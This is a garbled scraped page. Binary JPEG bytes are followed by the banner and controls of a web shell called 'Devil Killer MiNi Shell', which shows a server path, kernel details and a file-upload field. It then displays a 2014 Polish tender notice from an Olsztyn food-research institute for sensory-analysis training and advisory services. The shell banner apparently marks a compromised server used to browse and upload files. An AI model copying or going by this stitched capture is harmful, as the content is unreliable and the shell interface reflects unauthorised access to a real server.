JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140131/35768-N-2014.html

<p class="kh_header"><b>Olsztyn: świadczenie usługi wykonywania obowiązków koordynatora naukowego, przygotowania i przeprowadzenia szkoleń i realizacji usług doradczych na potrzeby projektu pt.: Badania sensoryczne jako metody opracowania i udoskonalenia produktów firm sektora rolno - spożywczego województwa warmińsko-mazurskiego.</b><br>
<b>Numer ogłoszenia: 35768 - 2014; data zamieszczenia: 31.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Rozrodu Zwierząt i Badań Żywności Polskiej Akademii Nauk , ul. Tuwima 10, 10-747 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5234692, faks 089 5234693.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pan.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Naukowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usługi wykonywania obowiązków koordynatora naukowego, przygotowania i przeprowadzenia szkoleń i realizacji usług doradczych na potrzeby projektu pt.: Badania sensoryczne jako metody opracowania i udoskonalenia produktów firm sektora rolno - spożywczego województwa warmińsko-mazurskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot postępowania obejmuje świadczenie usługi wykonywania obowiązków koordynatora naukowego, przygotowania i przeprowadzenia szkoleń i realizacji usług doradczych na potrzeby projektu pt.: Badania sensoryczne jako metody opracowania i udoskonalenia produktów firm sektora rolno - spożywczego województwa warmińsko-mazurskiego, współfinansowanego ze środków Europejskiego Funduszu Społecznego - Program Operacyjny Kapitał Ludzki. Do realizacji poniższych zadań Zamawiający będzie wymagał, żeby Wykonawca dysponował minimalną liczbą osób - w części pierwszej - min. 1 osobą, w części 2 - min. 4 osobami, w części 3 - min. 4 osobami. W części 1 Wykonawca musi dysponować co najmniej 1 osobą w stopniu profesora zwyczajnego, w części 2 i 3, co najmniej trzema osobami w stopniu doktora nauk rolniczych i jedną osobą w stopniu magistra inżyniera w zakresie nauk o żywności i żywieniu. Szczegółowe wymagania określa załącznik nr 2 do SIWZ.

2.	Zamówienie podzielono na trzy części. Zamawiający dopuszcza składanie ofert częściowych. Każdy Wykonawca może złożyć jedną ofertę na daną Część.

Część 1 - Zamówienie obejmuje świadczenie usługi wykonywania obowiązków Koordynatora naukowego, którego w zakresie obowiązków będzie: 
1. Odpowiedni dobór metodologii analiz i szkoleń prowadzonych przez naukowców dla poszczególnych przedsiębiorstw,  wskazanych przez Zamawiającego, biorących udział w projekcie;
2. Ocena i interpretacja uzyskanych wyników analiz;
3. Opracowanie prezentacji wyników;
4.  Nadzorowanie jakości badań i akceptacja raportów dla opracowania innowacyjnego produktu  w branży cukierniczej dla przedsiębiorstw biorących udział w projekcie;
5.  Nadzór nad opracowaniem dobrych praktyk w zakresie stosowania analizy sensorycznej w przedsiębiorstwach;
6.  Przygotowywanie programów szkoleń, harmonogramu doradztwa, zatwierdzanie ewidencji szkoleń oraz ewidencji godzin doradztwa; 
7.  Zatwierdzanie kwalifikowalności i poprawności kosztów projektowych, będących po stronie Zamawiającego;
8.  Udzielanie informacji organom kontrolnym;
9. Nadzór nad zgodnością prowadzonych działań będących po stronie Zamawiającego z postanowieniami zawartymi we wniosku o dofinansowanie, w tym z budżetem i harmonogramem;
10. Utrzymywanie stałych kontaktów z Liderem projektu.

Zadania o których mowa powyżej będą świadczone nieprzerwanie przez cały okres realizacji projektu w wymiarze 960 godzin, na podstawie ewidencji faktycznie przepracowanych godzin adekwatnie do założeń w projekcie. Rozliczenie na podstawie miesięcznej karty czasu pracy zatwierdzonej przez Kierownika projektu. 

Część II - Zamówienie obejmuje świadczenie usług szkoleniowych i doradczych dla 5 przedsiębiorstw wskazanych przez Zamawiającego, biorących udział w projekcie z sektora rolno - spożywczego, województwa warmińsko-mazurskiego, z branży mleczarskiej, przetwórstwa owocowo-warzywnego, wyrobów mrożonych i  garmażeryjnych oraz cukierniczych. Do zadań Wykonawcy będzie należało:

1.	Przygotowanie metodologii selekcji kandydatów do panelu sensorycznego.
2.	Przygotowanie i przeprowadzenie  testów dla Liderów Sensorycznych oraz osób do panelu sensorycznego.
3.	Opracowanie raportu z analizy otrzymanych rezultatów testów dla Liderów Sensorycznych - 1 raport.
4.	Opracowanie raportu z analizy otrzymanych rezultatów testów osób do paneli sensorycznych - 1 raport.
5.	Przeprowadzenie szkolenia  zamkniętego pt.: Analiza sensoryczna żywności - metody i zastosowania, wg norm  PN-ISO 3972, PN- ISO 5492, PN-ISO 5496, PN-ISO 8586:1, dostępnych na stronach www.pkn.pl

Zakres usługi: 
a) przygotowanie i przeprowadzenie szkolenia pt: Analiza sensoryczna żywności - metody i zastosowania. Zakres programowy szkolenia - sprawdzanie wrażliwości sensorycznej: podstawy teoretyczne i praktyczne, sprawdzenie wrażliwości sensorycznej, wyłonienie i zorganizowanie Panelu Sensorycznego w firmie, posługiwanie się podstawowymi normami i tablicą Ishihara. 
b) 1 grupa licząca 8 uczestników, 16 godzin szkoleniowych (wykład i warsztaty), opracowanie skryptu - materiałów szkoleniowych - 1 skrypt w wersji elektronicznej.
c) szkolenie skierowane do pracowników wydelegowanych przez przedsiębiorstwa (wskazane przez Zamawiającego), biorące udział w projekcie. Zamawiający dopuszcza większą ilość osób na szkoleniu w przypadku braku wrażliwości sensorycznej wśród wytypowanej pierwszej grupy 8 osób wskazanych przez przedsiębiorstwa.
Miejsce szkolenia: siedziba Zamawiającego.

6.	Przeprowadzenie szkolenia zamkniętego z zakresu wybranych metod różnicowych dla Liderów Sensorycznych wg norm PN-EN ISO 4120:2007, PN-EN ISO 5495:2007, ISO 8587:2006, ISO 10399:20004, dostępnych na stronach www.pkn.pl
Zakres usługi: 
a) Przygotowanie i przeprowadzenie szkolenia pt.: Szkolenie z zakresu wybranych metod różnicowych dla Liderów Sensorycznych. Zakres programowy: wybrane metody różnicowe do badania żywności;
b) 1 grupa licząca 8 uczestników, 32 godziny szkoleniowe(2x16godzin dydaktycznych- wykład i warsztaty), opracowanie skryptu -materiałów szkoleniowych- 1 szt.
c) Szkolenie skierowane do pracowników wydelegowanych i zaakceptowanych przez przedsiębiorstwa wskazane przez zamawiającego, biorące udział w projekcie.
Miejsce szkolenia: siedziba Zamawiającego.

7.	Przeprowadzenie szkolenia zamkniętego z zakresu metod profilowania sensorycznego dla Liderów Sensorycznych, wg norm PN ISO 8589:1998, ISO 13299:2003, PN- ISO 5492:1997, dostępnych na stronach www.pkn.pl
Zakres usługi: 
a) Przygotowanie i przeprowadzenie szkolenia pt.: Szkolenie z zakresu metod profilowania sensorycznego dla Liderów Sensorycznych. Zakres programowy: metody skalowania, posługiwanie się skalą, wybór wyróżników, ocena na wybranych prostych produktach, statystyka, interpretacja wyników). 
b) 1 grupa licząca 6 uczestników, 32 godziny szkoleniowe (2x16 godzin dydaktycznych wykład i warsztaty), opracowanie skryptu -materiałów szkoleniowych- 1 szt.
c) Szkolenie skierowane do pracowników wydelegowanych i zaakceptowanych przez przedsiębiorstwa wskazane przez zamawiającego, biorące udział w projekcie.
Miejsce szkolenia: siedziba Zamawiającego

8.	Przeprowadzenie doradztwa w formie grupowej dla 5 przedsiębiorstw wskazanych przez Zamawiającego .
Zakres usługi: 
a) Przeprowadzenie spotkania formie warsztatów dla przedstawicieli firm z naukowcami w siedzibie Zamawiającego. Zakres merytoryczny spotkania - weryfikacja prawidłowości stworzenia Paneli Sensorycznych w firmach, wstępne informacje dotyczące tworzenia laboratoriów sensorycznych wg normy PN- ISO 8589 (dostępnych na stronach www.pkn.pl) ,  analiza wyników dotychczasowych prac w firmach, analiza problemów z jakimi spotkali się Liderzy Sensoryczni.
b) 1 grupa 8 osobowa, 8 godzin warsztatów.
c) Miejsce doradztwa: siedziba Zamawiającego


9.	Przeprowadzenie doradztwa kierunkowego w 5 przedsiębiorstwach  na terenie województwa warmińsko-mazurskiego w zakresie sprawdzenia umiejętności nabytych podczas dotychczasowych szkoleń 
Zakres usługi: 
a) Przeprowadzenie spotkania pracowników naukowych z Liderami Sensorycznymi i członkami Panelu Sensorycznego w zakładach produkcyjnych i przeprowadzenie doradztwa kierunkowego (przez doradztwo kierunkowe rozumiemy doradztwo dostosowane do branży jaką reprezentuje firma) na produktach własnych firm. 
b) Sprawdzenie poprawności prowadzenia badań metodami różnicowymi, wsparcie dla Liderów sensorycznych, korekta działań, statystyczna analiza uzyskanych w firmach wyników, oraz doradztwo w zakresie statystycznego opracowania wyników).
c) Liczba godzin doradztwa - 32 
d) Doradztwo dla pracowników 5 przedsiębiorstw wskazanych przez zamawiającego biorących udział w projekcie na terenie województwa warmińsko-mazurskiego. 
e) Miejsce szkolenia: siedziby wskazanych przez Zamawiającego przedsiębiorstw na terenie województwa warmińsko - mazurskiego.

10.	Doradztwo kierunkowe w 4 firmach  (kierunek - analiza sensoryczna własnych produktów zgodnie z wskazanym poniżej zakresem wg normy ISO 13299:2003)
Zakres usługi: 
a) Przeprowadzenie spotkania pracowników naukowych z Liderami Sensorycznymi i członkami Panelu Sensorycznego w zakładach produkcyjnych i doradztwo kierunkowe na produktach własnych firm , wg metody QDA- po 2 dni do każdego laboratorium sensorycznego, 
b) opracowanie metodyki badań, weryfikacja otrzymanych wyników i korekty w działaniach, zaawansowana interpretacja statystyczna wyników - (48 godz. doradztwa)  oraz samodzielna ocena własnego produktu metodą ilościowej analizy opisowej pod nadzorem naukowców (po 16 h doradztwa dla każdej z firm, 2 dni - 1 dzień: przygotowanie, wybór wyróżników, sesja panelowa, 2 dzień: właściwa ocena, interpretacja uzyskanych  wyników) - (48 godz. doradztwa)
c) opracowanie raportu opisującego nowy produkt  (dokumentacja wskazująca na udział panelu sensorycznego i uzyskane wyniki wpływające na decyzje dotyczące nowego produktu) - 3 raporty, sporządzenie wewnętrznej  mapy jakościowej nowego produktu - 3 raporty. Liczba godzin doradztwa - 96
Miejsce szkolenia: siedziby przedsiębiorstw wskazanych przez Zamawiającego na terenie województwa warmińsko - mazurskiego.


Część III - Zamówienie obejmuje doradztwo dotyczące opracowania  receptury i technologii nowego innowacyjnego produktu w branży cukierniczej z wykorzystaniem analizy sensorycznej.

1. Doradztwo dedykowane pracownikom jednego mikro przedsiębiorstwa z województwa warmińsko-mazurskiego z branży cukierniczej wskazanego przez Zamawiającego, biorącego udział w projekcie. Zakres doradztwa obejmuje doradztwo w zakresie wypracowania receptury i technologii nowego produktu wybranego przez przedsiębiorcę. Raporty nowego produktu będą zatwierdzane przez koordynatora naukowego projektu. Doradztwo obejmuje 88 godzin doradztwa w przedsiębiorstwie i 280 godzin (2x140 godzin) testów technologicznych w warunkach laboratoryjnych i przemysłowych, ewidencjonowanych w karcie doradztwa i zatwierdzanych przez koordynatora naukowego.

2.Zakres usługi:
a)	Analiza szczegółów sytuacji zastanej w firmie i dotychczasowych prac nad produktem. Doradztwo naukowca w firmie (nie więcej niż 16 godz.), analiza ex-ante, dotycząca metod i technologii dotychczas stosowanych przez przedsiębiorstwo;
b)	Opracowanie 1 raportu z przeglądu literatury z tematyki dotyczącej przedmiotu badań (analiza Desk Research) - 1 raport.
c)	Doradztwo przez naukowca w firmie - przedstawienie możliwości i wspólny
 z przedsiębiorcą wybór metody produkcji (24 godz. doradztwa);
d)	Opracowanie 3 raportów z charakterystyki surowca możliwego do zastosowania przy produkcji (3 raporty dotyczące 3 surowców);
e)	Doradztwo przez naukowca w firmie - przedstawienie możliwości i specyfiki zastosowania różnych surowców (16 godz. doradztwa);
f)	Opracowanie 3 raportów z metod przygotowania otoczki możliwej do zastosowania przy produkcji.(3 raporty dotyczące 3 surowców);
g)	Doradztwo przez naukowca w firmie - przedstawienie możliwości i specyfiki przygotowywania otoczki - 3 warianty(16 godz. doradztwa)
h)	Opracowanie 3 raportów z metod obróbki surowca możliwej do zastosowania przy produkcji (3 raporty dotyczące 3 surowców);
i)	Doradztwo przez naukowca w firmie - przedstawienie możliwości i specyfiki obróbki surowca - 3 warianty (16 godz. doradztwa). Wybór ostatecznej koncepcji metody. 
j)	Testowanie metody w warunkach laboratoryjnych (min. 140 godzin), badania praca w laboratorium u Zamawiającego, wyposażonego w sprzęt i aparaturę pozwalająca na wyprodukowanie nowego produktu. 
k)	Testowanie metody w warunkach produkcyjnych (min. 140 godzin).- przeniesienie technologii we wskazane warunki przemysłowe w przedsiębiorstwie z wykorzystaniem wskazanej linii technologicznej z powierzonych materiałów.
l)	Opracowanie raportu pisemnego dotyczącego rekomendowanej receptury - 1 raport.
m)	Przedstawienie wniosków dotyczących możliwych udoskonaleń receptury, na podstawie wyników badań sensorycznych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.00.00.00-2, 73.11.10.00-3, 73.20.00.00-4, 73.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od pobierania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia  wg wzoru - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg wzoru - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wg wzoru - Załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Oświadczenie  wg wzoru - Załącznik nr 4 do SIWZ
2. Wykaz osób wg wzoru - Załącznik nr 2 do SIWZ:

część 1 
Wymagania:

1.	Posiadanie tytułu naukowego co najmniej profesora zwyczajnego w dziedzinie nauk rolniczych;
2.	Posiadanie min. 10-letniego doświadczenia w kierowaniu zespołem naukowców prowadzących badania z zakresu sensorycznego badania żywności
3.	 Min. 20 opublikowanych prac z zakresu zmian jakościowych i ilościowych związkach biologicznie aktywnych w procesach technologicznych i sensorycznego badania żywności.
4.	Posiadanie min. 5-letniego doświadczenia w kierowaniu co najmniej 4 grantami/projektami badawczymi z zakresu nauki o żywności i żywieniu

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1	 Rodzaj dokumentu - Rok wydania uprawnień 
2	Miejsce i okres pracy,  w którym pełniono funkcje kierownicze
3	Tytuł publikacji, miejsce i rok wydania
4	Tytuł projektu/ów w którym pełniono funkcje kierownicze z podaniem miejsca  i okresu realizacji


część 2
Wymagania:

A Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego doktora nauk rolniczych  w dyscyplinie technologia żywności  i żywienie.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

B Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego doktora nauk rolniczych  w dyscyplinie technologia żywności  i żywienie.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

C Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego doktora nauk rolniczych  w dyscyplinie technologia żywności  i żywienie.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

D Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego mgr. inż. w  zakresie nauk o żywności i żywieniu.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
3 Tytuł szkolenia, miejsce, ilość godzin i rok ; Usługi doradcze - nazwa przedsiębiorstwa, miejsce, ilość godzin i rok
4 Tytuł opracowania, miejsce i rok wydania
5 Tytuł publikacji, miejsce i rok wydania
6 Tytuł grantu-projektu, który realizowano z podaniem miejsca  i okresu realizacji
7 Rodzaj analiz-badań, który realizowano na rzecz przemysłu z podaniem miejsca  i okresu realizacji

część 3
Wymagania:

A Minimum 1 osoba spełniająca poniższe wymagania:

1.Posiadanie min. stopnia naukowego doktora nauk rolniczych  w dyscyplinie technologia żywności  i żywienie.
2.Posiadanie doświadczenia min. 5 lat w zakresie pracy naukowej związanej z nauką o żywności i żywieniu. 
3.Posiadanie doświadczenia w prowadzeniu szkoleń i doradztwa z zakresu analizy sensorycznej dla przedsiębiorstw (min.100 godzin szkoleń, , min. 150 godzin doradztwa dla pracowników firm sektora przemysłu spożywczego z tego zakresu.
4. Wykonanie lub współwykonanie co najmniej 5 opracowań/ekspertyz w zakresie sensorycznego badania żywności
5. Autor lub współautor min. 10 publikacji w zakresie chemii związków biologicznie aktywnych lub sensorycznego badania żywności
6.Posiadanie doświadczenia, w realizacji min. 5 grantów/projektów badawczych krajowych i min. 2 grantów/projektów międzynarodowych dotyczących analizy sensorycznej żywności lub związków biologicznie aktywnych.
7. Posiadanie doświadczenia w analizie jakościowej produktów z uwzględnieniem związków biologicznie aktywnych na rzecz przemysłu spożywczego.

Sposób poświadczenia wiedzy i doświadczenia osób (odpowienio do powyżej wskazanych pkt):

1 Rodzaj dokumentu - Rok wydania uprawnień 
2 Miejsce i okres pracy
